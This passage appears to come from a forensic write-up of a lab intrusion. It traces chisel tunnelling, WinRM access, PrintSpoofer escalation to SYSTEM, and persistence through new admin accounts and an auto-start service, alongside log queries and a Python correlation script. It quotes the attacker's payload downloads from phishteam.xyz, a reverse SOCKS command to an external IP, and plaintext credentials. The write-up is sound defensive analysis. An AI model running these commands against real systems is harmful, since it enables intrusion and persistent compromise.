d-r--- 6/21/2022 1:13 AM Downloads
d-r--- 6/20/2022 4:13 PM Favorites
d-r--- 6/20/2022 4:13 PM Links
d-r--- 6/20/2022 4:13 PM Music
dar--- 6/21/2022 1:15 AM OneDrive
d-r--- 6/20/2022 4:13 PM Pictures
d-r--- 6/20/2022 4:13 PM Saved Games
d-r--- 6/20/2022 4:13 PM Searches
d-r--- 6/20/2022 5:57 PM Videos
> dir C:\Users\benimaru\documents
> dir C:\users\benimaru\Desktop
Directory: C:\users\benimaru\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/20/2022 11:34 PM 268 automation.ps1
-a---- 6/20/2022 4:13 PM 1446 Microsoft Edge.lnk
> cat C:\Users\Benimaru\Desktop\automation.ps1
A file, automation.ps1, was discovered which contains the credentials of the user benimaru in plaintext:
$user = "TEMPEST\benimaru"
$pass = "infernotempest"
$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword
## TODO: Automate easy tasks to hack working hours
Following the user enumeration, network-related information was gathered; note TCP 5985 (WinRM) listening on all interfaces:
> netstat -ano -p tcp
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5508
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 4964
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 476
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1212
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2424
TCP 0.0.0.0:49671 0.0.0.0:0 LISTENING 624
TCP 0.0.0.0:49676 0.0.0.0:0 LISTENING 608
TCP 192.168.254.107:139 0.0.0.0:0 LISTENING 4
TCP 192.168.254.107:51802 52.139.250.253:443 ESTABLISHED 3216
TCP 192.168.254.107:51839 34.104.35.123:80 TIME_WAIT 0
TCP 192.168.254.107:51858 104.101.22.128:80 TIME_WAIT 0
TCP 192.168.254.107:51860 20.205.146.149:443 TIME_WAIT 0
TCP 192.168.254.107:51861 204.79.197.200:443 ESTABLISHED 4352
TCP 192.168.254.107:51871 20.190.144.169:443 TIME_WAIT 0
TCP 192.168.254.107:51876 52.178.17.2:443 ESTABLISHED 4388
TCP 192.168.254.107:51878 20.60.178.36:443 ESTABLISHED 4388
TCP 192.168.254.107:51881 52.109.124.115:443 ESTABLISHED 4388
TCP 192.168.254.107:51882 52.139.154.55:443 ESTABLISHED 4388
TCP 192.168.254.107:51884 40.119.211.203:443 ESTABLISHED 4388
TCP 192.168.254.107:51895 52.152.90.172:443 ESTABLISHED 5508
TCP 192.168.254.107:51896 20.44.229.112:443 ESTABLISHED 8904
Finally, the threat actor downloaded chisel (a TCP tunnelling tool with a reverse SOCKS mode) onto the workstation. The "base64: invalid input" text below is not attacker output: it is the decode loop failing on a record whose base64 padding had been cut off by cut -d'=' -f2.
> powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe
base64: invalid input
> dir C:\Users\benimaru\Downloads\ch.exe
Directory: C:\Users\benimaru\Downloads
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2022 1:17 AM 8230912 ch.exe
A reverse SOCKS proxy back to 167.71.199.191:8080 was then started. With R:socks the attacker's chisel server exposes a SOCKS listener whose connections exit through the workstation, giving the attacker a path to the internal network and to the workstation's own listening services:
$ cat sysmon.json | grep EventId..1, | grep benimaru | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^(ParentC|C)ommandLine|^User|^Hashes|^(ParentP|P)rocessId|^UtcTime"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add | select(.Image | test(".*ch.exe"))'
{
"UtcTime": "2022-06-20 17:18:48.723",
"ProcessId": "7388",
"Image": "C:\\Users\\benimaru\\Downloads\\ch.exe",
"CommandLine": "\"C:\\Users\\benimaru\\Downloads\\ch.exe\" client 167.71.199.191:8080 R:socks",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043",
"ParentProcessId": "8948",
"ParentCommandLine": "\"C:\\Users\\Public\\Downloads\\first.exe\""
}
The user benimaru belongs to the Remote Management Users group, TCP port 5985 is listening on the workstation, the user's plaintext password was recovered from automation.ps1, and the reverse SOCKS tunnel reaches the workstation from the attacker's side; together these gave the threat actor remote access via WinRM. The logs below show all Network logons (LogonType 3) of the compromised user. They begin seventeen seconds after chisel started, and each one precedes by a few seconds a process spawned from wsmprovhost.exe in the next section:
$ cat windows.json | grep -E 'EventId..4624' | grep 'benimaru' | grep -i "type 3" | jq -r '{LogonType: .PayloadData2, UserName: .PayloadData1, Time: .TimeCreated}'
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:19:05.7222347+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:20:06.2574361+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:21:05.5133859+00:00"
}
{
"LogonType": "LogonType 3",
"UserName": "Target: TEMPEST\\benimaru",
"Time": "2022-06-20T17:21:33.8813884+00:00"
}
III. Privilege Escalation
Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.
Subsequent executions were seen in the Sysmon logs but not as plaintext in the captured network traffic: they were carried inside the chisel tunnel (chisel multiplexes SSH-encrypted streams over a WebSocket connection, which accounts for the WebSocket frames in the protocol hierarchy) and ran under wsmprovhost.exe, the WinRM plugin host. This supports the assumption that the threat actor established a stable shell via WinRM.
The first execution was enumeration of privileges for the current user context (benimaru):
{
"UtcTime": "2022-06-20 17:19:16.266",
"ProcessId": "2068",
"Image": "C:\\Windows\\System32\\whoami.exe",
"CommandLine": "\"C:\\Windows\\system32\\whoami.exe\" /priv",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88",
"ParentProcessId": "6204",
"ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" whoami /priv"
}
After which, the files spf.exe and final.exe were downloaded onto the workstation, both from PowerShell children of wsmprovhost.exe -Embedding (the WinRM host process):
{
"UtcTime": "2022-06-20 17:20:06.648",
"ProcessId": "6804",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
"UtcTime": "2022-06-20 17:21:05.827",
"ProcessId": "3712",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" iwr http://phishteam.xyz/02dcf07/final.exe -outfile C:\\ProgramData\\final.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
spf.exe was then executed with -c C:\ProgramData\final.exe and, based on the executable's hash, was identified as PrintSpoofer, which abuses SeImpersonatePrivilege to run a command as SYSTEM. The output of the earlier whoami /priv is not recorded in the logs, but the success of the exploit shows that benimaru held that privilege, which is presumably what tipped the threat actor off:
{
"UtcTime": "2022-06-20 17:21:34.192",
"ProcessId": "6828",
"Image": "C:\\Users\\benimaru\\Downloads\\spf.exe",
"CommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe",
"User": "TEMPEST\\benimaru",
"Hashes": "MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF",
"ParentProcessId": "4208",
"ParentCommandLine": "C:\\Windows\\system32\\wsmprovhost.exe -Embedding"
}
{
"UtcTime": "2022-06-20 17:21:34.268",
"ProcessId": "8264",
"Image": "C:\\ProgramData\\final.exe",
"CommandLine": "C:\\ProgramData\\final.exe",
"User": "NT AUTHORITY\\SYSTEM",
"Hashes": "MD5=4C014F94A8FA0B484A2EDAB422AB2A1A,SHA256=03E1840A24506AFC88AB5FF7F83D2B07B558B34FF42DD34DD93267FD2E7A74E6,IMPHASH=468991D410EEFBCFB478FB910DDA2CE2",
"ParentProcessId": "6828",
"ParentCommandLine": "\"C:\\Users\\benimaru\\Downloads\\spf.exe\" -c C:\\ProgramData\\final.exe"
}
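The Security log logons and the Sysmon process records above line up closely, and the check below makes that explicit. It is an added example, not code from the original writeup: it pairs every process spawned directly by wsmprovhost.exe with the latest LogonType 3 logon within a 30-second window before it and reports the lag. The records are the ones printed on this page (the 4624 entries as flattened by the jq filter, the Sysmon entries trimmed to the fields used); ch.exe is included as a control because its parent is first.exe, not WinRM. The whoami /priv execution is a grandchild of wsmprovhost.exe through a powershell.exe whose own record is not shown on the page, so it cannot be linked here and the 17:19:05 logon is reported as unpaired; only direct children are matched.

```python
import re
from datetime import datetime, timedelta, timezone

# Security 4624 records as flattened by the jq filter above (page data).
LOGONS = [
    {"LogonType": "LogonType 3", "UserName": "Target: TEMPEST\\benimaru", "Time": "2022-06-20T17:19:05.7222347+00:00"},
    {"LogonType": "LogonType 3", "UserName": "Target: TEMPEST\\benimaru", "Time": "2022-06-20T17:20:06.2574361+00:00"},
    {"LogonType": "LogonType 3", "UserName": "Target: TEMPEST\\benimaru", "Time": "2022-06-20T17:21:05.5133859+00:00"},
    {"LogonType": "LogonType 3", "UserName": "Target: TEMPEST\\benimaru", "Time": "2022-06-20T17:21:33.8813884+00:00"},
]

# Sysmon Event ID 1 records from this page, trimmed to the fields used here.
PROCESSES = [
    {"UtcTime": "2022-06-20 17:18:48.723", "Image": r"C:\Users\benimaru\Downloads\ch.exe",
     "ParentCommandLine": r'"C:\Users\Public\Downloads\first.exe"'},  # control: not WinRM
    {"UtcTime": "2022-06-20 17:20:06.648", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentCommandLine": r"C:\Windows\system32\wsmprovhost.exe -Embedding"},
    {"UtcTime": "2022-06-20 17:21:05.827", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentCommandLine": r"C:\Windows\system32\wsmprovhost.exe -Embedding"},
    {"UtcTime": "2022-06-20 17:21:34.192", "Image": r"C:\Users\benimaru\Downloads\spf.exe",
     "ParentCommandLine": r"C:\Windows\system32\wsmprovhost.exe -Embedding"},
]


def parse_utc(ts):
    """Normalise both timestamp styles on the page to aware UTC datetimes.
    EvtxECmd writes 7 fractional digits; datetime.fromisoformat accepts at most 6."""
    ts = ts.strip().replace(" ", "T", 1)
    ts = re.sub(r"(\.\d{6})\d+", r"\1", ts)
    dt = datetime.fromisoformat(ts)
    if dt.tzinfo is None:  # Sysmon UtcTime carries no offset but is already UTC
        dt = dt.replace(tzinfo=timezone.utc)
    return dt.astimezone(timezone.utc)


def correlate_winrm(logons, processes, window=timedelta(seconds=30)):
    """Pair each process spawned by wsmprovhost.exe (the WinRM plugin host) with the latest
    network logon (type 3) that preceded it within `window`."""
    net_logons = sorted(
        ((parse_utc(l["Time"]), l) for l in logons if l["LogonType"].endswith(" 3")),
        key=lambda pair: pair[0],
    )
    paired = []
    for p in processes:
        if "wsmprovhost.exe" not in p["ParentCommandLine"].lower():
            continue
        spawned = parse_utc(p["UtcTime"])
        match = None
        for when, _logon in net_logons:
            if when <= spawned <= when + window:
                match = when  # keep the latest qualifying logon
        paired.append({
            "process": p["Image"],
            "spawned": spawned,
            "logon": match,
            "lag_s": None if match is None else (spawned - match).total_seconds(),
        })
    return paired


def unpaired_logons(logons, paired):
    """Network logons that no WinRM-spawned process was matched to (worth a second look)."""
    used = {p["logon"] for p in paired if p["logon"] is not None}
    return [l for l in logons if l["LogonType"].endswith(" 3") and parse_utc(l["Time"]) not in used]


if __name__ == "__main__":
    paired = correlate_winrm(LOGONS, PROCESSES)
    for p in paired:
        lag = ("no logon in window" if p["logon"] is None
               else f"{p['lag_s']:.3f}s after logon at {p['logon']:%H:%M:%S}")
        print(f"{p['spawned']:%H:%M:%S.%f}  {p['process']}  {lag}")
    for l in unpaired_logons(LOGONS, paired):
        print("logon without a direct wsmprovhost.exe child:", l["Time"])
```

Each matched process starts well under a second after its logon, which is the signature of a fresh WinRM session being opened for each command rather than one long-lived interactive shell.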
After the execution of final.exe, the Sysmon network connection events (Event ID 3) were checked for callbacks, and they show a new C2 channel on port 8080. Note also that final.exe shares its IMPHASH (468991D410EEFBCFB478FB910DDA2CE2) with first.exe, pointing to the same implant built with the same toolchain:
$ cat sysmon.json | grep EventId..3, | grep -i final.exe | jq -r '.Payload' | jq -r '[.EventData.Data[] | select(."@Name" | test("^Image|^U|^Source(Ip|Port)|^Destination(Ip|Port)"))] | to_entries | map({(.value."@Name"): (.value."#text")}) | add' | grep -E 'Image|Destination(Ip|Port")' | sort | uniq
"DestinationIp": "167.71.222.162",
"DestinationPort": "8080",
"Image": "C:\\ProgramData\\final.exe",
IV. Post-Exploitation
Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.
In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.
Callbacks to 167.71.222.162:8080 were parsed and decoded with the same loop as before (again using -f2- so that the base64 '=' padding is kept):
$ for i in $(tshark -r capture.pcapng -Y '(ip.dst==167.71.222.162 and tcp.port eq 8080) and frame contains "?q="' -T fields -e http.request.uri | cut -d'=' -f2-);
> do echo "$i" | base64 -d;   # '<command> - <output>' records, as on port 80
> done
The threat actor's current user context is now NT AUTHORITY\SYSTEM, the most privileged local account on the workstation:
> whoami
nt authority\system
> pwd
Path
----
C:\Windows\system32
> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
They attempted to create two new users, shuna and shion, but the commands failed because the /add option was missing (without it, net user tries to set the password of an existing account):
> net user shuna pr1nc3ss!
> net user shion m4st3rch3f!
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru WDAGUtilityAccount
The command completed with one or more errors.
With the correct syntax, the two users were created. Note that shuna's password differs from the first attempt (princess rather than pr1nc3ss!), which matters when documenting the credentials to revoke:
> net user /add shuna princess
The command completed successfully.
> net user /add shion m4st3rch3f!
The command completed successfully.
> net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator benimaru DefaultAccount
Guest rimuru shion
shuna WDAGUtilityAccount
The command completed with one or more errors.
For persistence the threat actor also changed the local Administrator's password and added the new user, shion, to the local Administrators group:
> net user Administrator ch4ng3dpassword!
The command completed successfully.
> net localgroup administrators /add shion
The command completed successfully.
> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
rimuru
shion
The command completed successfully.
The logs below confirm the creation of the two users (Event ID 4720) as well as the addition of shion (RID 1003) to the local Administrators group (Event ID 4732):
$ cat windows.json | grep -E 'EventId..4720' | jq -r '{Username: .PayloadData1, Time: .TimeCreated}'
{
"Username": "Target: TEMPEST\\shuna (S-1-5-21-349058839-1848105669-1528301110-1002)",
"Time": "2022-06-20T17:27:19.1269169+00:00"
}
{
"Username": "Target: TEMPEST\\shion (S-1-5-21-349058839-1848105669-1528301110-1003)",
"Time": "2022-06-20T17:27:28.6292691+00:00"
}
$ cat windows.json | grep -E 'EventId..4732' | grep Administrators | jq -r '{Group: .PayloadData1, MemberSID: .PayloadData4, Time: .TimeCreated}'
{
"Group": "Target: Builtin\\Administrators (S-1-5-32-544)",
"MemberSID": "MemberSid: S-1-5-21-349058839-1848105669-1528301110-1003",
"Time": "2022-06-20T17:27:41.2977760+00:00"
}
Another persistence method was creating a service (TempestUpdate2) that runs final.exe as LocalSystem at boot. The first attempt failed because a service named TempestUpdate already existed; that pre-existing service is not examined in this writeup and should be inspected as well (the System log's service-installation events and the service's registry key are the places to look):
> sc.exe \\TEMPEST create TempestUpdate binpath= C:\ProgramData\final.exe start= auto
[SC] CreateService FAILED 1073:
The specified service already exists.
> sc.exe \\TEMPEST create TempestUpdate2 binpath= C:\ProgramData\final.exe start= auto
[SC] CreateService SUCCESS
> sc.exe qc TempestUpdate2
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: TempestUpdate2
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\ProgramData\final.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TempestUpdate2
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
TIMELINE OF EVENTS
2022-06-20 17:12:56
free_magicules.doc was downloaded to the workstation.
2022-06-20 17:13:12
free_magicules.doc was opened in Microsoft Word.
2022-06-20 17:13:35
CVE-2022-30190 (Follina) execution via msdt.exe.
2022-06-20 17:13:37
update.zip was downloaded to the Startup folder.
2022-06-20 17:15:10
Stage 2 payload (first.exe) was downloaded to the workstation.
2022-06-20 17:15:14
First seen execution of first.exe.
2022-06-20 17:18:48
Download and execution of chisel (ch.exe).
2022-06-20 17:19:05
First seen (assumed) unauthorized logon to TEMPEST\benimaru via WinRM.
2022-06-20 17:20:06
PrintSpoofer exploit (spf.exe) was downloaded to the workstation.
2022-06-20 17:21:05
final.exe was downloaded to the workstation.
2022-06-20 17:21:34
Execution of spf.exe and final.exe (as NT AUTHORITY\SYSTEM).
2022-06-20 17:26:29
Creation of the TempestUpdate2 service for persistence.
2022-06-20 17:27:19
Creation of two users (shuna and shion) and addition of shion to the local Administrators group.